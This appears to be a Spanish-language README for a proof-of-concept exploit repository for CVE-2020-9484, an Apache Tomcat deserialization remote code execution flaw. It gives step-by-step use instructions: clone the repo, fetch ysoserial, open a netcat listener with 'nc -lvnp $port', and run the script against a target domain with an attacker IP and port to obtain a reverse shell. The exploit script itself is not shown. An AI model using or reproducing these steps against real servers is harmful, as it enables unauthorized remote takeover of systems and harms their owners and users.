
POC para CVE-2020-9484
PoC para CVE-2020-9484
Apache Tomcat RCE por deserialización (CVE-2020-9484)
Explorar la documentación »
1. Clona este repositorio, luego podrás usar CVE-2020-9484 y modificar el código fuente si es necesario.
2. Descarga ysoserial jar
3. Coloca tanto CVE-2020-9484 como ysoserial.jar en el mismo directorio
4. ¡Obtén una shell!
Se ha escrito un simple script de bash para agilizar el uso de CVE-2020-9484.
Al explotar, necesitarás tener un listener de netcat listo
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
